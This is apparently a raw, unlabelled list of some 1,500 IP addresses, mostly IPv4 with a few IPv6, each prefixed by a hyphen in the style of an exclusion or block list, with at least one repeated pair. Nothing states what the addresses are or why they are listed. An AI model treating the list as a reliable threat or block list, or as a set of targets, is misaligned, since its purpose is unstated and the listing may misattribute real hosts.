-125.253.127.173 -125.253.127.132 -180.153.58.144 -182.92.164.215 -120.27.7.239 -104.156.229.48 -104.239.161.92 -94.23.35.79 -95.163.78.239 -185.29.122.103 -172.246.101.4 -108.179.227.66 -178.79.189.154 -23.104.180.60 -35.199.155.92 -59.14.66.19 -220.181.161.135 -139.162.208.25 -116.62.224.195 -220.120.11.247 -198.200.41.1 -23.225.89.87 -45.41.92.140 -161.202.10.152 -104.203.139.85 -37.104.197.115 -108.61.214.134 -122.195.134.154 -112.74.179.154 -114.55.174.64 -45.124.95.122 -45.42.94.164 -120.25.222.212 -114.215.81.101 -37.187.252.92 -45.42.94.186 -172.107.147.46 -178.132.2.75 -114.215.152.120 -43.252.73.121 -160.16.107.243 -112.74.109.224 -153.122.27.37 -116.196.108.192 -64.120.123.208 -115.126.53.62 -178.32.246.97 -59.110.40.112 -138.201.235.26 -188.116.46.91 -74.206.187.159 -112.16.96.28 -50.97.176.37 -120.24.152.117 -54.248.254.93 -64.120.123.244 -114.55.24.61 -172.107.147.37 -103.205.3.112 -39.108.7.119 -142.4.107.65 -51.255.78.86 -104.207.40.188 -107.165.201.94 -46.166.160.5 -2600:3c00::f03c:91ff:fe18:3a72 -23.88.82.145 -41.185.22.62 -185.55.79.15 -45.61.113.12 -87.98.188.107 -52.55.98.244 -213.159.6.14 -210.212.174.12 -109.201.148.33 -116.53.193.213 -69.10.47.43 -199.83.63.157 -119.6.241.142 -45.114.94.23 -47.92.115.67 -88.208.239.13 -23.224.245.52 -111.230.41.242 -23.244.190.153 -61.128.121.212 -40.68.251.49 -54.186.81.184 -116.28.130.67 -23.225.239.36 -158.58.172.115 -104.203.139.184 -198.245.49.77 -123.207.227.210 -184.154.216.41 -149.56.36.189 -104.216.198.95 -188.165.132.231 -116.196.73.253 -114.119.9.132 -220.161.86.154 -120.26.59.55 -91.237.108.36 -185.7.112.81 -119.81.40.27 -104.207.50.73 -51.254.138.143 -61.154.228.38 -199.217.112.177 -211.72.117.142 -211.154.212.6 -150.95.177.176 -117.34.66.83 -78.111.82.99 -108.170.59.197 -91.237.99.145 -49.4.5.233 -170.231.100.191 -104.217.67.126 -185.163.100.76 -209.95.43.95 -67.212.233.60 -5.189.145.147 -173.236.41.142 -82.146.35.33 -117.80.188.82 -93.115.243.12 -122.13.87.170 -168.235.98.24 -120.55.184.77 -104.217.67.120 -69.13.210.171 -47.92.64.185 -104.203.139.74 -104.216.198.116 -182.92.213.88 -103.45.99.133 -45.32.106.39 -138.201.160.137 -188.93.126.173 -104.192.30.60 -219.142.105.11 -62.213.41.246 -202.146.219.49 -23.225.239.234 -43.240.244.88 -124.160.118.77 -119.61.11.221 -171.244.32.228 -23.104.187.5 -203.123.51.179 -103.65.181.99 -139.162.9.107 -106.187.37.229 -210.245.21.155 -120.79.31.223 -104.203.139.215 -14.102.153.77 -52.74.154.220 -218.245.6.98 -5.135.58.67 -120.25.162.33 -218.56.108.246 -162.247.233.43 -112.126.82.116 -119.23.129.196 -116.196.105.102 -96.8.115.51 -96.126.107.204 -121.42.55.112 -47.104.62.101 -149.154.66.209 -180.168.91.50 -54.36.88.134 -116.251.96.85 -109.169.86.92 -188.165.132.228 -82.135.151.209 -85.31.96.229 -104.216.198.238 -119.29.94.112 -184.107.98.93 -133.186.135.51 -114.215.107.213 -85.119.88.10 -120.76.25.87 -115.29.174.190 -211.162.68.115 -103.28.36.240 -185.174.29.177 -23.244.190.150 -176.31.153.241 -192.64.8.43 -183.136.233.103 -139.162.21.88 -35.193.118.192 -189.211.19.22 -122.10.112.201 -120.25.126.246 -96.47.237.24 -116.255.227.164 -114.55.176.245 -185.134.203.1 -45.35.99.132 -212.48.68.150 -149.202.12.78 -112.74.53.242 -120.25.156.169 -95.213.182.6 -142.91.95.246 -64.118.95.120 -121.42.251.43 -151.80.232.82 -178.32.34.66 -120.76.218.27 -175.102.1.81 -91.240.211.176 -178.32.28.165 -27.22.104.75 -202.6.17.135 -172.246.101.215 -45.61.114.41 -45.32.90.83 -23.104.135.129 -37.59.213.76 -106.75.134.176 -45.32.129.68 -104.149.66.134 -194.88.213.128 -202.181.24.128 -45.61.113.20 -103.200.23.232 -78.111.72.89 -36.66.196.182 -185.131.50.82 -104.203.139.103 -39.108.66.149 -67.229.63.96 -203.194.137.251 -112.74.246.196 -120.27.194.220 -103.205.1.118 -114.55.249.63 -106.185.35.40 -121.199.27.40 -2a02:2ad0:24c::1 -204.57.112.47 -109.120.166.20 -47.97.72.232 -110.81.179.189 -104.217.62.51 -23.244.241.249 -172.246.101.204 -182.16.110.13 -36.67.70.194 -104.243.42.178 -78.111.82.105 -103.12.49.25 -91.134.120.17 -68.67.62.149 -111.231.218.230 -185.195.77.66 -103.12.50.31 -121.42.158.4 -221.1.122.202 -45.77.111.102 -119.29.174.11 -164.132.49.180 -103.52.146.212 -67.19.21.138 -45.76.152.92 -27.223.20.98 -211.233.18.200 -123.207.57.244 -119.29.153.162 -86.104.177.89 -121.199.26.39 -188.165.200.71 -5.9.87.132 -39.107.102.70 -96.44.167.101 -45.56.71.224 -147.135.186.143 -39.106.200.252 -37.59.213.87 -198.136.58.52 -120.78.168.92 -45.77.37.237 -107.187.41.195 -118.190.35.79 -121.42.226.218 -183.81.161.167 -118.190.137.88 -166.63.21.4 -108.61.192.63 -104.217.62.9 -23.104.135.221 -47.92.39.162 -45.125.50.104 -45.32.101.42 -185.163.100.228 -139.162.244.194 -104.203.139.139 -210.209.125.133 -2600:3c03::f03c:91ff:fe26:22ee -120.26.209.8 -94.23.218.54 -54.174.10.189 -220.120.11.248 -112.124.7.146 -2605:6280:1:d::51 -41.110.72.195 -158.58.172.227 -91.197.186.250 -166.62.74.193 -104.217.58.19 -125.253.127.242 -144.217.243.180 -36.110.58.14 -67.222.13.202 -64.120.123.136 -121.43.110.131 -118.31.164.136 -5.39.48.10 -2001:4800:7817:104:be76:4eff:fe05:1a12 -121.97.17.226 -66.254.163.10 -202.6.17.174 -134.119.219.181 -54.159.122.181 -95.213.224.52 -120.192.190.163 -45.32.40.88 -118.89.36.55 -119.9.119.71 -104.237.135.120 -112.124.26.156 -23.244.241.214 -119.59.108.250 -167.114.13.117 -46.4.99.203 -104.130.253.235 -121.40.110.205 -212.158.174.49 -103.29.215.88 -155.94.224.131 -107.165.201.21 -79.137.45.91 -178.33.15.91 -23.225.89.190 -23.229.227.180 -61.182.254.124 -46.105.29.125 -23.225.0.223 -123.206.179.254 -120.24.42.135 -125.212.228.76 -58.222.21.70 -213.227.75.155 -120.25.239.41 -209.123.33.185 -31.7.63.170 -219.234.4.106 -173.236.92.142 -123.206.255.107 -64.118.95.197 -82.200.26.26 -163.172.132.106 -158.69.201.24 -142.91.95.33 -114.55.24.92 -41.76.203.63 -168.235.87.19 -113.34.59.82 -120.77.216.43 -122.114.26.141 -45.42.94.137 -114.55.24.65 -139.162.5.123 -155.254.18.244 -193.104.170.133 -146.71.124.203 -202.62.9.37 -45.61.114.53 -65.60.5.91 -78.140.179.102 -54.249.10.99 -139.162.249.58 -23.104.187.57 -198.147.26.30 -114.55.28.211 -92.43.113.69 -223.14.78.253 -116.52.145.10 -113.196.152.51 -188.132.215.232 -142.91.95.239 -113.118.159.46 -104.200.24.149 -92.43.113.74 -103.198.45.24 -202.174.123.95 -120.24.185.118 -45.115.236.107 -23.104.135.126 -106.3.45.30 -61.76.166.94 -85.12.197.151 -47.74.10.29 -34.214.255.59 -137.74.223.179 -112.124.10.113 -142.4.212.109 -109.196.95.249 -107.187.41.141 -45.35.102.166 -103.38.161.68 -71.9.31.98 -115.28.55.147 -142.91.95.153 -218.193.183.161 -104.216.198.64 -104.203.82.33 -201.184.239.181 -104.203.139.98 -164.52.150.250 -210.209.70.84 -130.211.159.237 -94.23.121.48 -114.215.101.8 -27.133.155.110 -23.104.135.55 -202.120.23.77 -192.99.114.186 -113.196.233.166 -158.69.93.81 -218.32.216.148 -54.223.66.171 -192.169.255.13 -52.5.223.188 -23.104.135.153 -66.254.177.71 -23.225.89.119 -200.27.182.8 -111.231.224.148 -103.43.71.5 -182.92.6.24 -138.201.195.209 -212.24.106.248 -14.177.235.207 -119.23.108.255 -198.57.163.156 -118.190.17.87 -50.63.156.243 -107.165.201.202 -192.0.19.74 -64.120.16.243 -118.25.22.26 -169.57.154.12 -112.124.39.173 -115.231.236.92 -198.176.48.73 -63.243.240.54 -139.129.131.15 -112.74.183.178 -222.186.161.27 -198.27.123.228 -23.244.241.85 -112.90.225.12 -155.254.18.250 -80.84.55.199 -120.136.44.15 -103.74.119.1 -190.52.64.28 -23.225.0.56 -185.242.162.7 -45.61.113.19 -13.228.194.198 -51.15.185.165 -212.129.43.227 -58.218.171.138 -89.33.247.9 -54.149.89.235 -122.147.104.104 -185.38.45.116 -113.108.127.81 -62.109.11.107 -167.88.178.28 -61.14.236.83 -103.12.50.19 -159.226.119.145 -45.35.99.131 -85.204.96.102 -81.95.146.143 -104.207.40.159 -61.144.194.159 -212.233.112.11 -49.212.170.139 -183.81.167.206 -112.124.53.222 -195.42.162.106 -23.224.115.54 -94.130.168.152 -45.122.253.178 -185.163.100.58 -23.225.0.11 -58.58.111.254 -115.28.228.21 -54.188.126.157 -173.44.60.47 -172.110.18.246 -185.27.134.165 -114.215.223.147 -172.87.29.8 -182.92.225.222 -144.168.124.7 -60.205.143.148 -103.56.70.13 -23.225.89.127 -222.187.245.149 -115.29.46.142 -23.225.0.232 -45.77.68.136 -123.249.28.211 -66.209.190.74 -222.178.78.82 -216.92.175.42 -161.202.10.145 -45.125.236.103 -217.182.39.14 -178.33.42.157 -66.175.213.87 -103.44.28.17 -104.207.129.222 -103.205.3.93 -123.56.26.203 -112.124.9.103 -120.77.202.1 -173.82.151.34 -72.1.245.81 -208.122.206.93 -119.28.137.149 -209.141.46.42 -132.148.14.223 -119.23.146.45 -46.30.45.78 -182.254.240.152 -64.58.228.97 -45.35.102.172 -218.90.212.93 -45.117.83.132 -160.153.113.65 -23.244.190.206 -172.106.187.225 -218.26.21.148 -190.85.90.253 -103.205.0.110 -5.39.26.197 -45.79.196.142 -37.187.248.98 -54.165.89.25 -70.36.125.52 -23.104.180.44 -64.120.123.215 -104.128.237.27 -103.205.2.71 -65.60.43.190 -37.187.253.115 -121.199.33.61 -149.202.28.14 -34.228.59.9 -120.78.159.131 -23.225.239.228 -87.241.31.232 -112.192.137.21 -218.32.216.84 -91.206.14.202 -200.136.214.132 -101.200.40.60 -104.203.139.237 -23.104.177.47 -49.212.143.140 -193.187.76.250 -52.209.128.1 -119.29.54.52 -166.63.21.81 -181.196.176.196 -219.142.40.29 -178.20.242.63 -188.132.148.106 -112.25.55.100 -185.81.167.222 -120.76.141.150 -139.162.45.77 -112.74.205.133 -142.91.243.109 -103.43.173.73 -23.224.115.23 -115.29.223.49 -188.132.135.35 -103.65.181.108 -103.100.157.52 -112.94.22.8 -112.82.144.131 -23.19.237.39 -119.235.209.18 -172.247.116.89 -103.242.1.55 -198.200.41.53 -121.41.108.69 -169.51.77.8 -185.163.100.6 -23.244.241.152 -45.76.162.174 -172.246.101.101 -221.210.42.98 -103.3.173.152 -120.25.69.66 -188.116.4.241 -166.63.21.52 -185.165.0.33 -72.1.245.108 -120.76.247.65 -153.120.180.39 -94.130.125.29 -150.95.183.126 -123.56.11.115 -104.203.82.73 -103.12.49.29 -123.57.150.24 -172.106.184.20 -61.14.232.17 -211.152.45.39 -23.225.0.9 -111.207.202.18 -208.92.165.6 -185.56.169.202 -116.55.3.50 -81.171.31.186 -116.62.159.148 -200.201.204.30 -185.27.134.52 -114.112.104.96 -23.225.89.248 -42.121.88.59 -23.244.190.63 -23.230.19.189 -188.165.187.61 -172.246.101.60 -59.34.131.95 -39.108.6.26 -88.99.105.124 -46.166.162.94 -172.107.73.245 -103.243.94.230 -104.203.139.201 -104.216.198.61 -62.75.146.95 -116.62.24.77 -120.25.91.106 -23.244.190.227 -47.96.132.33 -188.132.228.109 -89.40.169.207 -103.100.157.23 -123.58.3.124 -13.127.27.17 -104.203.139.198 -107.180.69.254 -83.167.253.222 -115.236.179.166 -122.114.202.21 -23.225.89.116 -37.58.76.163 -101.200.195.227 -173.236.111.166 -65.49.82.52 -23.110.47.198 -104.203.139.44 -95.0.152.252 -69.64.45.53 -93.170.130.31 -54.88.199.171 -104.207.52.97 -114.55.141.163 -103.200.6.23 -121.201.69.70 -94.198.98.50 -119.114.57.13 -173.233.92.138 -64.207.98.68 -142.91.95.148 -39.107.102.214 -184.107.209.76 -72.52.162.70 -75.126.205.63 -45.61.115.16 -34.235.143.220 -104.247.76.59 -34.235.143.220 -104.247.76.59 -103.197.57.85 -112.74.66.252 -23.244.190.5 -115.29.230.63 -50.93.198.176 -104.203.139.41 -202.168.148.222 -85.62.16.19 -205.234.211.83 -202.74.234.206 -116.255.153.26 -121.40.21.236 -216.158.235.2 -104.207.154.64 -174.137.49.30 -39.129.36.128 -101.0.72.84 -185.48.175.3 -216.92.242.174 -177.234.158.98 -45.79.209.117 -104.203.139.39 -37.187.200.214 -142.4.215.185 -192.163.198.131 -172.106.184.62 -54.171.175.152 -120.136.36.171 -113.10.192.132 -107.23.84.68 -23.110.61.119 -199.193.153.118 -162.212.252.43 -45.42.94.169 -180.168.66.62 -213.33.153.82 -54.251.5.169 -52.207.155.193 -64.118.90.219 -178.33.15.69 -104.217.58.28 -115.29.150.71 -23.225.239.77 -149.202.109.105 -123.57.157.36 -183.131.180.126 -80.82.127.235 -94.130.146.87 -104.224.202.163 -188.165.37.194 -173.249.158.95 -103.12.50.39 -23.225.239.164 -185.174.28.78 -47.95.23.186 -166.63.21.70 -210.248.158.36 -168.235.84.165 -172.255.159.228 -172.104.90.80 -92.48.118.201 -61.58.60.232 -121.41.14.124 -167.114.11.10 -103.205.0.91 -185.174.28.87 -103.236.160.9 -103.226.126.26 -47.90.20.232 -45.42.94.162 -136.243.106.253 -185.80.162.28 -198.143.151.90 -34.205.30.40 -114.215.198.32 -188.213.22.156 -78.140.179.108 -104.237.152.231 -13.115.78.136 -41.77.234.9 -101.78.128.49 -120.27.139.72 -45.40.132.4 -23.225.0.166 -145.239.29.95 -120.24.57.50 -88.150.157.238 -185.49.70.87 -103.100.157.141 -47.93.76.198 -23.254.247.19 -109.169.86.145 -177.131.0.137 -23.225.239.198 -142.4.107.203 -69.87.197.173 -107.164.66.187 -212.112.216.26 -61.153.205.10 -47.92.71.98 -172.107.75.233 -195.248.234.155 -109.175.164.20 -208.38.172.57 -108.61.201.73 -124.127.184.69 -113.207.126.2 -169.57.10.71 -47.96.140.137 -23.225.239.9 -213.136.77.60 -217.61.7.59 -5.135.59.58 -47.98.36.106 -191.7.26.17 -218.145.65.241 -103.84.46.132 -23.104.135.186 -192.154.231.117 -192.162.112.9 -148.251.162.129 -200.29.18.117 -46.166.134.159 -95.211.217.85 -112.124.12.144 -5.135.58.73 -23.244.190.189 -109.254.248.69 -120.27.155.226 -107.150.119.148 -216.26.164.217 -45.77.37.219 -18.217.15.236 -104.232.75.138 -81.2.216.133 -160.124.140.154 -119.29.160.18 -114.55.28.56 -41.165.25.102 -185.22.185.8 -185.114.193.102 -222.186.170.54 -103.28.38.99 -23.110.61.104 -103.205.1.97 -123.57.175.72 -213.189.63.98 -202.43.109.224 -62.76.40.167 -103.6.86.23 -67.229.73.89 -65.60.24.54 -115.146.127.155 -118.178.253.85 -45.35.102.143 -198.50.142.172 -118.31.228.255 -34.200.220.246 -94.23.220.161 -27.0.15.208 -5.189.154.113 -182.16.20.43 -211.80.107.209 -115.29.77.142 -115.28.160.45 -45.117.83.148 -38.130.229.143 -202.124.205.24 -115.28.49.83 -182.254.133.218 -172.106.184.9 -104.216.198.67 -23.244.241.52 -164.70.8.149 -172.106.187.242 -192.163.223.97 -50.97.191.187 -116.246.16.194 -114.215.176.241 -125.212.225.241 -54.148.89.144 -121.40.94.10 -114.215.78.175 -104.149.66.189 -139.224.34.61 -155.230.6.172 -198.11.183.67 -164.132.182.26 -185.155.99.109 -119.42.149.230 -87.237.204.223 -120.25.192.119 -120.76.114.183 -2a03:b0c0:3:d0::7e2:7001 -104.217.58.35 -87.76.29.66 -198.200.41.36 -198.176.48.74 -124.205.7.70 -188.95.48.55 -106.14.149.111 -23.104.180.9 -139.129.93.27 -125.64.92.87 -58.63.245.127 -104.217.54.49 -14.102.150.14 -31.24.201.122 -139.224.24.215 -120.25.231.90 -64.118.87.205 -107.164.66.223 -104.232.102.184 -115.226.175.127 -116.62.71.73 -117.25.143.27 -120.24.185.128 -120.77.220.13 -34.202.166.95 -103.81.168.176 -203.123.51.217 -189.205.82.229 -78.24.222.187 -23.244.190.34 -65.60.5.81 -60.205.141.142 -59.110.1.198 -158.69.142.145 -172.246.101.237 -172.107.73.246 -185.25.204.171 -79.137.83.153 -166.62.35.228 -87.98.165.56 -109.201.146.84 -52.196.123.227 -23.225.0.131 -209.95.39.83 -177.52.160.17 -120.55.68.145 -167.114.156.184 -158.177.92.200 -188.120.232.246 -54.225.203.176 -58.221.79.84 -176.223.197.39 -139.162.34.131 -182.92.111.92 -23.244.241.158 -5.189.177.98 -120.77.180.110 -139.199.181.218 -103.216.188.84 -45.40.134.155 -198.24.161.131 -46.149.115.115 -108.163.166.245 -80.93.26.174 -103.100.157.102 -23.104.176.28 -185.130.178.34 -59.110.227.59 -176.31.73.103 -172.107.146.157 -52.59.110.45 -124.202.145.93 -101.0.72.83 -23.88.82.75 -47.98.60.135 -202.53.227.212 -23.238.129.70 -173.236.43.131 -87.120.36.22 -58.97.58.48 -103.205.1.92 -23.224.115.146 -118.190.92.60 -42.157.4.107 -74.117.155.20 -120.79.31.75 -142.44.172.24 -103.205.0.113 -172.106.187.254 -216.45.55.237 -178.87.129.188 -203.146.102.14 -104.217.58.29 -103.205.0.98 -195.62.53.68 -23.104.135.253 -47.90.86.212 -109.202.107.26 -203.66.65.46 -144.168.74.137 -213.189.56.148 -45.33.93.246 -115.159.211.99 -212.71.253.67 -13.127.16.54 -114.55.103.65 -207.244.77.39 -87.98.250.131 -174.139.42.146 -116.236.231.222 -23.224.244.13 -66.39.66.219 -122.114.219.220 -52.197.206.90 -101.251.254.43 -185.174.28.124 -120.24.36.45 -115.29.226.240 -52.55.183.212 -109.73.168.208 -173.255.209.186 -188.165.187.59 -104.224.200.252 -178.20.242.62 -89.19.22.220 -23.238.166.142 -125.126.29.202 -112.124.46.168 -204.11.233.147 -200.12.46.78 -172.106.186.13 -120.25.99.67 -120.26.120.33 -104.203.82.35 -89.108.109.5 -178.79.183.226 -142.91.95.23 -119.29.169.170 -104.155.207.82 -101.251.147.52 -74.86.147.251 -121.40.47.205 -58.208.172.203 -91.121.223.162 -91.230.194.88 -113.196.233.179 -45.79.155.116 -107.150.25.137 -23.104.176.11 -185.85.239.182 -107.6.117.150 -118.178.188.119 -103.230.86.141 -178.79.152.235 -91.218.230.206 -96.44.167.98 -172.246.101.234 -119.148.15.91 -120.77.233.109 -107.150.57.30 -112.74.95.128 -42.62.11.98 -119.23.214.80 -182.90.252.58 -101.200.212.254 -185.38.45.104 -116.62.173.93 -47.100.51.222 -67.229.58.242 -168.235.95.162 -116.62.6.142 -23.244.241.98 -113.108.163.204 -91.121.89.140 -166.62.92.79 -50.115.116.243 -49.212.204.230 -5.196.132.85 -104.41.178.81 -185.52.1.245 -47.52.25.187 -104.149.66.159 -115.28.173.101 -38.83.106.211 -120.25.199.24 -124.128.251.181 -173.192.74.250 -83.219.229.93 -123.57.11.141 -85.152.144.21 -91.221.70.226 -103.28.38.92 -51.255.145.199 -35.185.160.223 -45.252.249.134 -202.74.40.123 -136.243.238.81 -221.237.225.19 -120.24.56.124 -115.159.212.179 -91.193.221.227 -97.90.101.67 -172.104.226.107 -142.91.95.108 -45.42.94.177 -23.238.145.78 -23.225.0.195 -185.44.192.238 -213.202.218.221 -49.1.248.93 -23.244.241.20 -142.91.243.86 -121.134.127.161 -132.148.26.75 -121.42.191.122 -103.255.179.102 -83.145.130.155 -66.35.51.198 -14.1.96.56 -45.41.92.155 -120.25.147.181 -23.19.202.43 -59.110.170.100 -47.97.22.248 -198.27.89.178 -103.12.51.7 -172.104.154.235 -120.26.227.32 -87.252.252.219 -66.102.192.22 -101.200.215.30 -210.56.60.63 -104.203.139.97 -139.129.98.7 -60.235.42.194 -123.126.136.222 -116.62.120.233 -45.76.197.100 -34.253.189.46 -54.65.114.33 -216.224.172.144 -185.62.101.66 -185.163.100.101 -219.90.122.36 -198.20.106.100 -120.24.236.190 -82.135.151.218 -62.138.8.128 -198.101.229.21 -187.63.167.30 -47.88.101.70 -151.80.255.17 -23.224.242.19 -172.110.18.197 -200.5.228.244 -62.129.139.93 -14.18.242.191 -142.91.232.78 -173.208.187.26 -103.100.157.74 -113.196.75.66 -115.47.121.32 -45.76.162.94 -103.100.157.6 -119.81.11.38 -106.15.39.191 -104.203.82.42 -185.174.29.191 -136.0.69.27 -54.236.26.185 -104.217.54.38 -103.12.51.20 -123.206.181.64 -185.22.65.38 -113.103.12.192 -107.165.201.127 -198.24.128.4 -115.28.39.117 -222.121.52.34 -120.237.163.36 -5.196.214.12 -158.69.197.229 -185.174.31.217 -194.28.172.67 -166.62.34.110 -46.37.185.229 -208.43.222.107 -38.105.9.51 -148.81.246.111 -103.205.0.118 -172.106.186.41 -157.7.167.91 -210.222.116.224 -185.36.175.148 -202.77.104.171 -23.244.190.35 -95.215.0.248 -194.0.200.120 -54.154.138.46 -45.32.119.238 -178.239.178.43 -23.238.166.138 -162.247.233.34 -46.21.106.189 -103.198.45.57 -104.203.82.120 -173.212.215.249 -187.63.160.8 -103.29.70.173 -133.242.52.147 -198.143.186.108 -46.10.105.44 -118.89.36.171 -101.37.30.179 -85.204.97.165 -119.27.185.22 -108.163.129.183 -47.92.24.245 -122.114.241.251 -145.239.198.230 -115.201.191.146 -23.104.135.37 -104.224.233.62 -139.162.9.243 -123.56.112.14 -63.243.249.38 -137.74.45.236 -66.175.221.152 -23.244.190.254 -120.27.37.192 -222.73.219.222 -37.113.131.214 -185.163.100.158 -115.213.63.94 -45.32.121.65 -216.224.167.214 -121.42.167.108 -185.45.192.108 -121.196.233.70 -120.24.248.170 -114.55.100.212 -37.59.51.27 -103.100.157.7 -172.246.101.198 -117.54.227.116 -204.14.31.157 -200.44.167.91 -139.196.6.252 -86.104.177.63 -104.207.52.95 -74.86.113.167 -123.124.42.66 -45.76.191.231 -204.44.71.140 -43.249.9.45 -120.77.168.168 -213.158.170.4 -115.28.109.174 -123.207.155.231 -220.181.130.196 -120.132.61.32 -182.48.52.117 -217.172.189.253 -45.114.94.35 -86.104.177.51 -45.114.94.160 -47.88.150.160 -185.124.84.162 -69.64.48.85 -45.76.182.73 -59.110.160.251 -54.175.159.80 -94.242.222.229 -54.38.76.42 -103.205.3.106 -37.113.131.226 -142.4.107.251 -96.44.179.243 -178.32.190.80 -142.4.119.70 -185.86.79.61 -45.33.85.139 -101.201.107.140 -35.170.21.64 -123.57.238.111 -123.207.96.243 -185.70.135.4 -82.135.151.88 -23.104.187.24 -84.51.42.42 -139.196.196.153 -119.61.64.173 -218.242.26.115 -123.207.28.215 -97.107.134.57 -172.107.71.9 -101.254.185.76 -101.200.79.78 -172.106.186.50 -218.32.216.82 -186.226.184.3 -121.40.99.18 -61.164.153.203 -160.238.172.21 -121.12.172.28 -115.28.180.162 -84.39.97.132 -119.23.68.99 -216.224.162.224 -39.106.191.119 -195.133.144.31 -216.155.145.82 -104.238.83.72 -94.177.122.13 -131.255.5.53 -5.196.81.89 -139.199.80.85 -120.25.168.175 -103.20.28.12 -118.190.26.88 -142.91.95.187 -45.76.171.156 -66.220.11.150 -47.89.9.4 -188.132.215.236 -67.229.63.114 -119.145.72.210 -137.74.81.200 -23.104.135.88 -62.112.9.79 -5.196.83.92 -221.208.242.244 -202.6.17.147 -120.25.144.110 -120.136.44.7 -52.201.36.46 -149.202.71.235 -174.139.52.164 -123.56.234.184 -23.88.82.56 -72.250.162.35 -196.30.251.180 -139.199.203.51 -75.126.136.61 -58.56.98.104 -120.77.87.123 -43.248.226.162 -104.217.67.118 -94.23.52.45 -120.79.56.6 -112.124.26.58 -117.78.24.23 -66.254.177.66 -88.214.230.116 -47.90.6.213 -142.91.95.2 -103.242.2.97 -172.246.101.174 -94.140.210.189 -23.88.82.79 -103.231.90.182 -121.199.2.139 -121.196.216.51 -116.255.211.167 -172.246.101.57 -58.97.76.64 -120.26.200.178 -103.205.0.89 -167.114.206.237 -120.79.163.114 -199.241.142.211 -195.154.151.29 -120.194.18.90 -188.132.215.233 -54.193.87.188 -206.214.210.214 -162.247.76.173 -216.92.127.127 -61.136.101.60 -50.63.12.79 -114.55.143.1 -64.15.150.157 -5.135.58.115 -46.31.44.199 -172.246.101.142 -172.104.118.169 -120.77.241.116 -103.100.157.83 -103.205.3.101 -62.109.16.196 -112.74.108.201 -109.73.168.241 -192.227.206.29 -178.32.184.217 -185.80.162.26 -107.158.255.220 -42.96.167.149 -195.211.154.204 -116.231.33.86 -209.95.39.84 -188.132.147.25 -222.191.229.206 -192.163.248.91 -139.162.105.37 -112.124.45.42 -45.76.180.171 -107.180.78.204 -172.82.180.156 -185.163.100.94 -118.193.251.10 -103.216.120.210 -23.238.166.151 -185.124.84.167 -185.53.168.197 -43.229.63.108 -91.134.136.25 -220.180.239.174 -112.124.57.19 -222.73.130.236 -47.93.46.248 -173.214.188.38 -103.230.39.51 -202.74.40.246 -212.68.42.199 -64.120.123.186 -52.8.104.118 -120.27.152.237 -54.254.218.224 -101.37.16.155 -31.220.0.201 -173.212.253.99 -185.37.228.138 -121.127.231.125 -107.165.201.35 -134.119.60.200 -23.225.89.192 -209.188.8.187 -47.96.177.140 -114.55.245.235 -45.35.102.156 -218.77.114.2 -82.146.55.206 -172.107.165.34 -182.171.78.18 -180.169.129.59 -210.12.138.104 -37.230.115.208 -123.56.71.134 -23.225.239.222 -54.86.241.124 -47.93.112.254 -100.43.152.122 -181.48.138.114 -109.101.139.134 -46.249.48.13 -198.98.101.32 -59.110.168.163 -120.205.22.117 -188.40.103.219 -195.128.49.158 -45.32.110.159 -120.76.190.62 -119.139.34.189 -212.71.237.144 -121.40.96.70 -23.88.82.226 -133.242.21.69 -213.187.75.140 -174.139.41.154 -120.78.199.80 -45.61.113.28 -217.182.78.135 -212.109.220.32 -23.225.239.230 -87.98.228.33 -51.255.171.60 -67.23.229.118 -23.88.82.90 -108.59.13.136 -101.251.194.114 -168.235.103.151 -120.27.40.134 -39.108.107.43 -188.116.12.173 -182.254.159.200 -78.111.82.97 -121.40.115.51 -52.69.22.228 -153.122.5.112 -123.196.117.223 -115.29.47.131 -37.59.213.79 -122.166.25.150 -81.21.62.235 -46.105.118.11 -198.57.162.131 -66.70.164.37 -125.253.127.117 -112.121.175.74 -195.68.169.53 -42.120.45.220 -120.237.99.3 -116.236.231.223 -103.208.100.242 -45.32.123.5 -164.52.150.242 -122.114.207.215 -104.203.139.56 -45.35.99.171 -172.104.46.226 -198.1.123.182 -23.88.82.123 -45.41.92.156 -23.225.89.237 -47.97.219.137 -115.29.232.115 -45.76.76.69 -59.110.23.18 -95.167.9.98 -103.19.130.67 -212.118.102.83 -115.29.162.126 -39.108.246.32 -187.115.80.51 -202.103.203.18 -62.219.11.150 -58.20.242.124 -47.93.126.216 -52.22.76.108 -120.78.152.208 -116.255.211.98 -66.171.236.157 -123.57.216.220 -172.106.184.24 -161.202.191.133 -139.129.241.191 -199.102.46.220 -186.68.94.131 -112.74.74.183 -112.213.88.191 -23.104.135.164 -139.129.47.66 -158.69.36.9 -180.87.34.195 -217.115.137.198 -185.174.31.218 -112.74.94.166 -218.56.99.50 -174.140.163.86 -202.47.95.219 -161.202.7.152 -106.15.60.153 -31.216.36.153 -31.179.249.205 -60.171.110.107 -190.158.252.181 -203.123.51.226 -5.189.136.102 -203.195.167.165 -109.73.168.196 -202.125.177.10 -103.235.234.195 -178.33.254.86 -52.90.225.118 -201.73.242.35 -46.105.105.84 -221.234.18.181 -109.73.168.242 -5.2.174.145 -50.63.189.169 -119.23.51.36 -104.203.82.41 -159.253.39.163 -45.113.160.85 -23.88.82.20 -222.223.195.37 -103.37.45.17 -183.6.139.134 -211.147.239.182 -218.0.2.146 -139.162.146.220 -185.163.100.27 -23.238.129.104 -114.215.220.121 -121.42.154.34 -174.37.242.40 -185.174.28.74 -103.28.38.33 -121.41.7.9 -49.212.173.180 -76.12.219.16 -67.229.63.68 -115.236.9.162 -190.228.29.72 -212.68.50.76 -172.107.64.32 -182.254.214.100 -45.76.205.194 -198.91.90.46 -151.80.255.20 -89.40.169.208 -120.26.61.107 -120.77.177.79 -67.229.63.77 -176.223.197.42 -101.69.241.29 -37.59.146.64 -185.163.100.39 -89.33.8.164 -96.30.51.42 -59.110.172.112 -54.89.78.189 -82.135.151.115 -59.60.31.239 -47.88.226.116 -185.8.173.243 -185.174.29.193 -60.205.138.243 -47.90.83.108 -118.193.204.149 -173.203.184.190 -119.252.174.188 -180.76.238.148 -121.199.56.141 -103.9.158.201 -172.107.73.213 -52.201.253.167 -112.109.208.179 -218.61.195.227 -122.143.21.206 -114.55.224.188 -115.29.164.145 -137.74.0.24 -123.57.82.90 -52.59.100.96 -104.130.169.218 -119.42.150.75 -119.2.66.66 -54.223.246.77 -116.236.187.3 -103.20.184.246 -23.104.135.57 -115.29.172.236 -172.107.73.203 -183.167.246.174 -138.201.84.198 -139.162.210.166 -45.32.127.62 -115.68.89.38 -23.225.89.12 -180.166.135.19 -112.6.127.36 -172.106.184.26 -142.91.95.240 -202.85.222.170 -23.104.177.25 -115.28.247.161 -54.64.12.165 -185.174.30.139 -108.179.217.169 -107.180.84.61 -115.29.41.117 -103.100.157.171 